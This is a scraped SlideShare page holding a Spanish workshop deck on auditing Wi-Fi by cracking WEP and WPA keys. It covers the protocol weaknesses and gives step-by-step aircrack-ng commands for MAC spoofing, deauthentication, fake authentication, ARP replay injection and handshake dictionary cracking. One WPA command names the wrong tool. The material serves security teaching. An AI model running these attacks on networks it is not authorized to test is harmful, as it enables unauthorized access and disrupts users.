SlideShare uma empresa Scribd logo
1 de 37
Auditoria WirelessCracking WEP & WPA keys
Jorge Luis Hernandez C.
lesthack@gmail.com
http://lesthack.com.mx
Linux/Aircrack
@lesthack
Contenido
Introducción
WEP
WPA
Practicas
Part 1
http://bit.ly/bSbc9z
@lesthack
Contenido
Introducción
WEP
WPA
Practicas
Razones por las cuales tomé el taller
● Me interesa conocer las herramientas de
seguridad.
● Me interesa saber los algoritmos de Encriptación
WEP y WPA.
● Quisiera saber como protegerme de Ataques de
este tipo
● Quiero aprender a romper claves WEP y WPA para
robarme el internet.
@lesthack
Contenido
Introducción
WEP
WPA
Practicas
Objetivo
● Se conocerán las vulnerabilidades de seguridad de
los protocolos de transmisión WEP y WPA frente a
ataques de fuerza bruta y probabilidad y
estadística.
● Se trabajará con herramientas de Testeo como
Aircrack bajo ambientes GNU/Linux
● Se conocerán los medios de protección que
compliquen la explotación de las vulnerabilidades
de las claves WEP y WPA.
@lesthack
WEP
● Significado:
● WEP != Wireless Encryption Protocol
● WEP = Wired Equivalent Privacy
● Sistema de cifrado incluido en el Estándar IEEE
802.11 como protocolo para redes Wireless
● Se propone como alternativa de confidencialidad
frente a las comunicaciones de cableado en 1999
● Se usa en dispositivos de transmisión wireless
casera. Ejemplo de ello son los dispositivos 2wire
de Teléfonos de México.
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WEP
● En el 2001 se explotan fácilmente las debilidades
de WEP.
● La IEEE crea una corrección de seguridad 802.11i
para neutralizar los problemas.
● En el 2003 Wi-Fi anuncia el remplazo de WEP por
Wi-Fi Protected Access (WPA).
● En el 2004 la alianza Wi-Fi revoca WEP-40 y
WEP-104 por serios fallos de seguridad.
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WEP
● Se basa en el algoritmo de cifrado RC4 que utiliza
claves de
● 64 bits (40 bits mas 24 bits del Vector de iniciacion
IV)
● 128 bits (104 bits mas 24 bits del IV)
● 256 bits (232 bits mas 24 bits del IV)
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WEP
● Funciona expandiendo una semilla (seed) para
generar una secuencia de números pseludo-
aleatorios de mayor tamaño bajo la operación
XOR.
● No se debe usar la misma semilla para cifrar dos
mensajes diferentes.
● WEP especifica un Vector de Iniciación (IV) de 24
bits que se modifica regularmente y se concatena
a la contraseña (Esta es la semilla)
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WEP
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WEP
WEP
¿ Que es ?
Función
Vulnerabilidad
RC4
@lesthack
WEP
● Con la captura de n número de paquetes, es
posible y por algoritmos estadísticos, obtener la
clave WEP.
● Colisión de IV's.
● Alteración de Paquetes.
WEP
¿ Que es ?
Función
Vulnerabilidad
@lesthack
WPA
● Es un sistema para proteger las redes
inalámbricas (Wi-Fi); creado para corregir las
deficiencias del sistema previo WEP.
● WPA usa autenticación de usuarios mediante un
servidor, se almacenan las credenciales y
contraseñas.
● Implementa el Protocolo de Integridad de Clave
Temporal (TKIP - Temporal Key Integrity Protocol),
cambia claves dinámicamente.
WPA
¿ Que es ?
Vulnerabilidad
@lesthack
WPA
● Implementa un código de integridad del mensaje
(MIC - Message Integrity Code).
● Incluye protección contra ataques de "repetición".
WPA
¿ Que es ?
Vulnerabilidad
@lesthack
WPA
● WPA-PSK
● Mucho mas segura que WEP.
● Usa un Algoritmo RC4 como WEP.
● Basado en el Protocolo TKIP (Temporal Key
Integrity Protocol) que cambia la clave
dinamicamente.
● Menos segura que WPA con Autenticación en
Servidor.
WPA
¿ Que es ?
Vulnerabilidad
@lesthack
WPA
● WPA con Autenticación en Servidor
● En la que es el servidor (RADIUS) de autentificación
el encargado de distribuir claves diferentes entre los
usuarios.
● Mucho mas segura que WPA-PSK.
● Complicada para configurar para usuario doméstico.
WPA
¿ Que es ?
RADIUS: Remote Authentication Dial-In User Server
Vulnerabilidad
@lesthack
WPA2 ?
● Lo mismo que WPA, es el estándar avanzado de
cifrado (AES) en vez de TKIP.
● Corrige las vulnerabilidades de WPA.
● El estándar cumple con los requerimientos de
seguridad del gobierno de USA.
● No todos los dispositivos lo soportan.
WPA
¿ Que es ?
Vulnerabilidad
@lesthack
WPA
WPA
¿ Que es ?
Vulnerabilidad
@lesthack
aircrack
Practicas WEP
Practica WPA
Part 2
@lesthack
aircrack
Herramientas
● Herramientas a usar:
● Aircrack 1.0 rc3
● Macchanger
● Terminator
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Debian {derivados [Ubuntu, Backtrack 4]}
● apt-get install aircrack macchanger terminator
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Aircrack es una suite de seguridad wireless
integrado por:
● Packet Sniffer
● Cracker WEP y WPA
● Diversas Utilerías
● Uso:
● # aireplay-ng <opciones> <interface>
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Conceptos:
● SSID [Service Set Identifier]
– BSSID [Basic Service Set Identifier]
– ESSID [Extended Service Set Identifier]
● Interfaz:
– Dispositivo asociado al hardware en sistemas *nix
● Channel:
– Canal de transferencia, regularmente asociado a la
frecuencia.
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Opciones de aireplay
● # aireplay-ng <opciones> <interface>
– -b bssid : Dirección MAC del punto de acceso
– -d dmac : Dirección MAC de destino
– -s smac : Dirección MAC origen (source)
– -m len : Longitud mínima del paquete
– -n len : Longitud máxima del paquete
– -u type : frame control, type field
– -v subt : frame control, subtype field
– -t tods : frame control, To DS bit
– -f fromds : frame control, From DS bit
– -w iswep : frame control, WEP bit
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Opciones de inyección
● -x nbpps : número de paquetes por segundo
● -p fctrl : fijar palabra frame control (hexadecimal)
● -a bssid : fijar dirección MAC del AP
● -c dmac : fijar dirección MAC de destino
● -h smac : fijar dirección MAC origen
● -e essid : ataque de falsa autenticación: nombre del AP
● -j : ataque arp-replay: inyectar paquetes FromDS
● -g valor : cambiar tamaño de buffer (default: 8)
● -k IP : fijar IP de destino en fragmentos
● -l IP : fijar IP de origen en fragmentos
● -o npckts : número de paquetes por burst (-1)
● -q sec : segundos entre paquetes sigo aquí o keep-alives (-1)
● -y prga : keystream para autenticación compartida (shared key)
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Abrimos Terminator en modo root
● Alt + F2
● Escribimos terminator
● Cambiamos a modo root
● $ sudo su
● $su [si usas debian]
● Modificamos Split's al antojo
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Vemos interfaces Generales
● # ifconfig
● Vemos interfaces Wireless
● # iwconfig
● Bajos interfaz
● # ifconfig interface down
● Cambiamos MAC
● # macchanger -r wlan0
● Levantamos interfaz
● # ifconfig interface up
Instalación
Fundamentos
Cambiando MAC
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Modo Monitor:
● # airmon-ng start wlan0
Instalación
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Cambiando MAC
Fundamentos
Modo Monitor
@lesthack
aircrack
Herramientas
● Deauthentication Attack
● Este ataque envia paquetes de desasociación a uno
o más clientes que están actualmente asociados a
un punto de acceso.
– Recuperar o desvelar un ESSID oculto. Este es un
ESSID que no es divulgado o anunciado por el AP.
– Capturar handshakes WPA/WPA2 forzando a los
clientes a volverse a autenticar.
– Generar peticiones ARP (en Windows, algunas
veces, los clientes borran su “ARP cache” cuando
son desconectados).
–
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Uso:
● # aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c
00:0F:B5:34:30:30 ath0
– -0 significa deautenticación
– 1 es el número de deautenticaciones a enviar
(puedes enviar todas las que quieras); 0 significa
enviarlas continumente
– -a 00:14:6C:7E:40:80 es la dirección MAC del punto
de acceso
– -c 00:0F:B5:34:30:30 es la dirección MAC del cliente
a deautenticar; si se omite serán deautenticados
todos los clientes
– ath0 es el nombre de la interface
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Fake Autentication
● El ataque de falsa autenticación permite realizar los
dos tipos de autenticación WEP (abierta u “Open
System” y compartida o “Shared Key”) y asociarse
con el punto de acceso (AP).
● Esto es muy útil cuando necesitamos una dirección
MAC asociada para usarla con alguno de los
ataques de aireplay-ng y no hay ningún cliente
asociado.
● Se debe tener en cuenta que el ataque de falsa
autenticación NO genera ningún paquete ARP.
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Uso:
● # aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h
00:09:5B:EC:EE:F2 ath0
– -1 significa falsa autenticación
– 0 tiempo de reasociación en segundos
– -e teddy es el nombre de la red wireless
– -a 00:14:6C:7E:40:80 es la dirección MAC del punto de
acceso
– -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra
tarjeta
– ath0 es el nombre de la interface wireless
● Variaciones:
– aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a
00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
Crack WPA
aircrack
Herramientas
● Capturar:
● # airodump-ng -c 9 –bssid 00:11:22:33:44:55 -w psk
ath0
● Desautenticar cliente para capturar HandShake:
● # airodump-ng -0 1 -a 00:14:6C:7E:40:80 -c
00:0F:85:FD:FB:C2 ath0
● Crackeando clave
● # aircrack-ng -w password.lst -b 00:14:6C:7E:40:80
psk*.cap
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Interactive Packet Reply
● Este ataque nos permite escoger el paquete a
reenviar (inyectar).
● Puede obtener paquetes para inyectar de 2 formas.
– La primera es capturando paquetes con la tarjeta
wireless.
– La segunda es utilizando un archivo cap.
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Uso:
● # aireplay-ng -2 <opciones de filtro> <opciones de
reenvio> -r <nombre de archivo> <interface>
– -2 significa ataque de reenvio interactivo
– <opciones de filtro>
– <opciones de reenvio>
– -r <nombre de archivo> se usa para especificar un
archivo cap del que leer los paquetes para
inyectarlos (es opcional)
– <interface> es la interface wireless, por ejemplo ath0
● Ejemplo:
● # aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b
00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Request Injection
● El clásico ataque de reenvio de petición ARP o
“ARP request” es el modo más efectivo para
generar nuevos IVs (vectores de inicialización), y
funciona de forma muy eficaz.
● El programa escucha hasta encontrar un paquete
ARP y cuando lo encuentra lo retransmite hacia el
punto de acceso.
● Esto provoca que el punto de acceso tenga que
repetir el paquete ARP con un IV nuevo.
● El programa retransmite el mismo paquete ARP una
y otra vez. Pero, cada paquete ARP repetido por el
AP tiene un IV nuevo. Todos estos nuevos IVs nos
permitirán averiguar la clave WEP.
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Uso:
● # aireplay-ng -3 -b 00:13:10:30:24:9C -h
00:11:22:33:44:55 ath0
– -3 significa reenvio estandard de petición arp (arp
request)
– -b 00:13:10:30:24:9C es la dirección MAC del punto
de acceso
– -h 00:11:22:33:44:55 es la dirección MAC origen (de
un cliente asociado o de una falsa autenticación)
– ath0 es el nombre de la interface wireless
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor
@lesthack
aircrack
Herramientas
● Crackeando los paquetes
● # aircrack-ng paquetes.ivs
Instalación
Cambiando MAC
Fundamentos
Ataque 0
Ataque 1
Ataque 2
Ataque 3
Modo Monitor

Mais conteúdo relacionado

Mais procurados

Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]RootedCON
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAPaulo Colomés
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiConferencias FIST
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
 
Webinar Gratuito: Atacar Redes WEP con Kali Linux
Webinar Gratuito: Atacar Redes WEP con Kali LinuxWebinar Gratuito: Atacar Redes WEP con Kali Linux
Webinar Gratuito: Atacar Redes WEP con Kali LinuxAlonso Caballero
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wirelessruben0909
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]RootedCON
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasTensor
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]RootedCON
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 

Mais procurados (20)

Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPA
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Webinar Gratuito: Atacar Redes WEP con Kali Linux
Webinar Gratuito: Atacar Redes WEP con Kali LinuxWebinar Gratuito: Atacar Redes WEP con Kali Linux
Webinar Gratuito: Atacar Redes WEP con Kali Linux
 
HTTPS: Usted, úselo bien.
HTTPS: Usted, úselo bien.HTTPS: Usted, úselo bien.
HTTPS: Usted, úselo bien.
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemas
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wireless
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traseras
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
 
Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 

Semelhante a Taller SITEC 2010

Semelhante a Taller SITEC 2010 (20)

Juan
JuanJuan
Juan
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Seguridad
SeguridadSeguridad
Seguridad
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Redeswifi i
Redeswifi iRedeswifi i
Redeswifi i
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad Wireless
 
Encriptacion[1]
Encriptacion[1]Encriptacion[1]
Encriptacion[1]
 
Administración de un router
Administración de un routerAdministración de un router
Administración de un router
 
Aircrack ng
Aircrack ngAircrack ng
Aircrack ng
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
inSEGURIDADE EN REDES WIFI
inSEGURIDADE EN REDES WIFIinSEGURIDADE EN REDES WIFI
inSEGURIDADE EN REDES WIFI
 
tipos-de-encriptacion
 tipos-de-encriptacion tipos-de-encriptacion
tipos-de-encriptacion
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
Configuracion switch(8)
Configuracion switch(8)Configuracion switch(8)
Configuracion switch(8)
 
Hacking wireless by Alberto García
Hacking wireless by Alberto GarcíaHacking wireless by Alberto García
Hacking wireless by Alberto García
 
Propietario
PropietarioPropietario
Propietario
 
Inserguridad en WIFI
Inserguridad en WIFIInserguridad en WIFI
Inserguridad en WIFI
 

Taller SITEC 2010

  • 1. Auditoria WirelessCracking WEP & WPA keys Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx Linux/Aircrack
  • 3. @lesthack Contenido Introducción WEP WPA Practicas Razones por las cuales tomé el taller ● Me interesa conocer las herramientas de seguridad. ● Me interesa saber los algoritmos de Encriptación WEP y WPA. ● Quisiera saber como protegerme de Ataques de este tipo ● Quiero aprender a romper claves WEP y WPA para robarme el internet.
  • 4. @lesthack Contenido Introducción WEP WPA Practicas Objetivo ● Se conocerán las vulnerabilidades de seguridad de los protocolos de transmisión WEP y WPA frente a ataques de fuerza bruta y probabilidad y estadística. ● Se trabajará con herramientas de Testeo como Aircrack bajo ambientes GNU/Linux ● Se conocerán los medios de protección que compliquen la explotación de las vulnerabilidades de las claves WEP y WPA.
  • 5. @lesthack WEP ● Significado: ● WEP != Wireless Encryption Protocol ● WEP = Wired Equivalent Privacy ● Sistema de cifrado incluido en el Estándar IEEE 802.11 como protocolo para redes Wireless ● Se propone como alternativa de confidencialidad frente a las comunicaciones de cableado en 1999 ● Se usa en dispositivos de transmisión wireless casera. Ejemplo de ello son los dispositivos 2wire de Teléfonos de México. WEP ¿ Que es ? Función Vulnerabilidad
  • 6. @lesthack WEP ● En el 2001 se explotan fácilmente las debilidades de WEP. ● La IEEE crea una corrección de seguridad 802.11i para neutralizar los problemas. ● En el 2003 Wi-Fi anuncia el remplazo de WEP por Wi-Fi Protected Access (WPA). ● En el 2004 la alianza Wi-Fi revoca WEP-40 y WEP-104 por serios fallos de seguridad. WEP ¿ Que es ? Función Vulnerabilidad
  • 7. @lesthack WEP ● Se basa en el algoritmo de cifrado RC4 que utiliza claves de ● 64 bits (40 bits mas 24 bits del Vector de iniciacion IV) ● 128 bits (104 bits mas 24 bits del IV) ● 256 bits (232 bits mas 24 bits del IV) WEP ¿ Que es ? Función Vulnerabilidad
  • 8. @lesthack WEP ● Funciona expandiendo una semilla (seed) para generar una secuencia de números pseludo- aleatorios de mayor tamaño bajo la operación XOR. ● No se debe usar la misma semilla para cifrar dos mensajes diferentes. ● WEP especifica un Vector de Iniciación (IV) de 24 bits que se modifica regularmente y se concatena a la contraseña (Esta es la semilla) WEP ¿ Que es ? Función Vulnerabilidad
  • 9. @lesthack WEP WEP ¿ Que es ? Función Vulnerabilidad
  • 10. @lesthack WEP WEP ¿ Que es ? Función Vulnerabilidad RC4
  • 11. @lesthack WEP ● Con la captura de n número de paquetes, es posible y por algoritmos estadísticos, obtener la clave WEP. ● Colisión de IV's. ● Alteración de Paquetes. WEP ¿ Que es ? Función Vulnerabilidad
  • 12. @lesthack WPA ● Es un sistema para proteger las redes inalámbricas (Wi-Fi); creado para corregir las deficiencias del sistema previo WEP. ● WPA usa autenticación de usuarios mediante un servidor, se almacenan las credenciales y contraseñas. ● Implementa el Protocolo de Integridad de Clave Temporal (TKIP - Temporal Key Integrity Protocol), cambia claves dinámicamente. WPA ¿ Que es ? Vulnerabilidad
  • 13. @lesthack WPA ● Implementa un código de integridad del mensaje (MIC - Message Integrity Code). ● Incluye protección contra ataques de "repetición". WPA ¿ Que es ? Vulnerabilidad
  • 14. @lesthack WPA ● WPA-PSK ● Mucho mas segura que WEP. ● Usa un Algoritmo RC4 como WEP. ● Basado en el Protocolo TKIP (Temporal Key Integrity Protocol) que cambia la clave dinamicamente. ● Menos segura que WPA con Autenticación en Servidor. WPA ¿ Que es ? Vulnerabilidad
  • 15. @lesthack WPA ● WPA con Autenticación en Servidor ● En la que es el servidor (RADIUS) de autentificación el encargado de distribuir claves diferentes entre los usuarios. ● Mucho mas segura que WPA-PSK. ● Complicada para configurar para usuario doméstico. WPA ¿ Que es ? RADIUS: Remote Authentication Dial-In User Server Vulnerabilidad
  • 16. @lesthack WPA2 ? ● Lo mismo que WPA, es el estándar avanzado de cifrado (AES) en vez de TKIP. ● Corrige las vulnerabilidades de WPA. ● El estándar cumple con los requerimientos de seguridad del gobierno de USA. ● No todos los dispositivos lo soportan. WPA ¿ Que es ? Vulnerabilidad
  • 17. @lesthack WPA WPA ¿ Que es ? Vulnerabilidad
  • 19. @lesthack aircrack Herramientas ● Herramientas a usar: ● Aircrack 1.0 rc3 ● Macchanger ● Terminator Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 20. @lesthack aircrack Herramientas ● Debian {derivados [Ubuntu, Backtrack 4]} ● apt-get install aircrack macchanger terminator Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 21. @lesthack aircrack Herramientas ● Aircrack es una suite de seguridad wireless integrado por: ● Packet Sniffer ● Cracker WEP y WPA ● Diversas Utilerías ● Uso: ● # aireplay-ng <opciones> <interface> Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 22. @lesthack aircrack Herramientas ● Conceptos: ● SSID [Service Set Identifier] – BSSID [Basic Service Set Identifier] – ESSID [Extended Service Set Identifier] ● Interfaz: – Dispositivo asociado al hardware en sistemas *nix ● Channel: – Canal de transferencia, regularmente asociado a la frecuencia. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 23. @lesthack aircrack Herramientas ● Opciones de aireplay ● # aireplay-ng <opciones> <interface> – -b bssid : Dirección MAC del punto de acceso – -d dmac : Dirección MAC de destino – -s smac : Dirección MAC origen (source) – -m len : Longitud mínima del paquete – -n len : Longitud máxima del paquete – -u type : frame control, type field – -v subt : frame control, subtype field – -t tods : frame control, To DS bit – -f fromds : frame control, From DS bit – -w iswep : frame control, WEP bit Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 24. @lesthack aircrack Herramientas ● Opciones de inyección ● -x nbpps : número de paquetes por segundo ● -p fctrl : fijar palabra frame control (hexadecimal) ● -a bssid : fijar dirección MAC del AP ● -c dmac : fijar dirección MAC de destino ● -h smac : fijar dirección MAC origen ● -e essid : ataque de falsa autenticación: nombre del AP ● -j : ataque arp-replay: inyectar paquetes FromDS ● -g valor : cambiar tamaño de buffer (default: 8) ● -k IP : fijar IP de destino en fragmentos ● -l IP : fijar IP de origen en fragmentos ● -o npckts : número de paquetes por burst (-1) ● -q sec : segundos entre paquetes sigo aquí o keep-alives (-1) ● -y prga : keystream para autenticación compartida (shared key) Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 25. @lesthack aircrack Herramientas ● Abrimos Terminator en modo root ● Alt + F2 ● Escribimos terminator ● Cambiamos a modo root ● $ sudo su ● $su [si usas debian] ● Modificamos Split's al antojo Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 26. @lesthack aircrack Herramientas ● Vemos interfaces Generales ● # ifconfig ● Vemos interfaces Wireless ● # iwconfig ● Bajos interfaz ● # ifconfig interface down ● Cambiamos MAC ● # macchanger -r wlan0 ● Levantamos interfaz ● # ifconfig interface up Instalación Fundamentos Cambiando MAC Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
